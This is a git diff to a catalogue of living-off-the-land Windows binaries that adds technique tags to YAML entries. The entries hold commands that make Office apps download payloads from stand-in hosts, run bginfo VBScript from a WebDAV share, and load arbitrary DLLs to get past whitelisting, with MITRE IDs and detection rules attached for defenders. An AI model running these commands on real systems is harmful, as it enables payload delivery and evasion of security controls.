 - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
 Description: Execute VBscript code that is referenced within the bginfo.bgi file.
 Usecase: Local execution of VBScript
@@ -18,12 +20,16 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: WSH
 - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
 Usecase: Remote execution of VBScript
 Description: Execute bginfo.exe from a WebDAV server.
 Category: Execute
 Privileges: User
 MitreID: T1218
+ Tags:
+ - Execute: WSH
 OperatingSystem: Windows
 - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
 Usecase: Remote execution of VBScript
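Review bot: In the `@@ -18,12 +20,16 @@` hunk of Bginfo.yml the second `Tags:` block is inserted between `MitreID: T1218` and `OperatingSystem: Windows`, whereas every other entry touched by this commit places `Tags:` after `OperatingSystem:`. YAML mapping order does not affect parsing, but the site generator and anyone diffing entries by eye will see one command laid out differently from the rest; moving the two added lines below `OperatingSystem: Windows` keeps the per-command layout uniform. The same inconsistency does not recur in the other Bginfo hunks, so this looks like an editing slip rather than an intended order.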
@@ -32,6 +38,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: WSH
 - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
 Usecase: Remote execution of VBScript
 Description: This style of execution may not longer work due to patch.
@@ -39,6 +47,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: WSH
 - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
 Usecase: Remote execution of VBScript
 Description: This style of execution may not longer work due to patch.
@@ -46,10 +56,10 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: WSH
 Full_Path:
 - Path: No fixed path
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
 - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml
index b3d7c4f..b2fb1f7 100644
--- a/yml/OtherMSBinaries/Coregen.yml
+++ b/yml/OtherMSBinaries/Coregen.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1055
 OperatingSystem: Windows
+ Tags:
+ - Execute: DLL
 - Command: coregen.exe dummy_assembly_name
 Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
 Usecase: Execute DLL code
@@ -25,6 +27,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
 - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
@@ -42,8 +46,5 @@ Resources:
 - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
 Acknowledgement:
 - Person: Nicky Tyrer
- Handle:
 - Person: Evan Pena
- Handle:
 - Person: Casey Erikson
- Handle:
diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml
index 025d0ee..b89523a 100644
--- a/yml/OtherMSBinaries/Excel.yml
+++ b/yml/OtherMSBinaries/Excel.yml
@@ -6,11 +6,13 @@ Created: 2019-07-19
 Commands:
 - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
 Description: Downloads payload from remote server
- Usecase: It will download a remote payload and place it in the cache folder
+ Usecase: It will download a remote payload and place it in INetCache.
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
 - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml
index fb2ac30..a1af94e 100644
--- a/yml/OtherMSBinaries/MsoHtmEd.yml
+++ b/yml/OtherMSBinaries/MsoHtmEd.yml
@@ -6,11 +6,13 @@ Created: 2022-07-24
 Commands:
 - Command: MsoHtmEd.exe https://example.com/payload
 Description: Downloads payload from remote server
- Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+ Usecase: It will download a remote payload and place it in INetCache.
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
 - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
diff --git a/yml/OtherMSBinaries/Mspub.yml b/yml/OtherMSBinaries/Mspub.yml
index b810233..e325d90 100644
--- a/yml/OtherMSBinaries/Mspub.yml
+++ b/yml/OtherMSBinaries/Mspub.yml
@@ -6,11 +6,13 @@ Created: 2022-08-02
 Commands:
 - Command: mspub.exe https://example.com/payload
 Description: Downloads payload from remote server
- Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+ Usecase: It will download a remote payload and place it in INetCache.
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
 - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml
index 2b7313d..b72699d 100644
--- a/yml/OtherMSBinaries/Powerpnt.yml
+++ b/yml/OtherMSBinaries/Powerpnt.yml
@@ -6,11 +6,13 @@ Created: 2019-07-19
 Commands:
 - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
 Description: Downloads payload from remote server
- Usecase: It will download a remote payload and place it in the cache folder
+ Usecase: It will download a remote payload and place it in INetCache.
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
 - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml
index 85890cb..0b05151 100644
--- a/yml/OtherMSBinaries/Procdump.yml
+++ b/yml/OtherMSBinaries/Procdump.yml
@@ -12,14 +12,18 @@ Commands:
 Category: Execute
 Privileges: User
 MitreID: T1202
- OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
+ OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
+ Tags:
+ - Execute: DLL
 - Command: procdump.exe -md calc.dll foobar
 Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
 Usecase: Performs execution of unsigned DLL.
 Category: Execute
 Privileges: User
 MitreID: T1202
- OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
+ OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: no default
 Detection:
diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml
index 33e6de2..5c3bdb5 100644
--- a/yml/OtherMSBinaries/Te.yml
+++ b/yml/OtherMSBinaries/Te.yml
@@ -18,6 +18,9 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: DLL
+ - Input: Custom Format
 Full_Path:
 - Path: no default
 Detection:
diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml
index 90029d4..abaddfd 100644
--- a/yml/OtherMSBinaries/Tracker.yml
+++ b/yml/OtherMSBinaries/Tracker.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: DLL
 - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
 Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
 Usecase: Injection of locally stored DLL file into target process.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: no default
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml
index c1697df..dddff5e 100644
--- a/yml/OtherMSBinaries/Winword.yml
+++ b/yml/OtherMSBinaries/Winword.yml
@@ -6,11 +6,13 @@ Created: 2019-07-19
 Commands:
 - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
 Description: Downloads payload from remote server
- Usecase: It will download a remote payload and place it in the cache folder
+ Usecase: It will download a remote payload and place it in INetCache.
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
 - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
@@ -28,8 +30,6 @@ Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
 - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
 - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
 - IOC: Suspicious Office application Internet/network traffic
diff --git a/yml/OtherMSBinaries/vsls-agent.yml b/yml/OtherMSBinaries/vsls-agent.yml
index b5f4b7f..817ef21 100644
--- a/yml/OtherMSBinaries/vsls-agent.yml
+++ b/yml/OtherMSBinaries/vsls-agent.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
 Detection:
diff --git a/yml/OtherMSBinaries/vstest.console.yml b/yml/OtherMSBinaries/vstest.console.yml
index aa950be..c476fec 100644
--- a/yml/OtherMSBinaries/vstest.console.yml
+++ b/yml/OtherMSBinaries/vstest.console.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe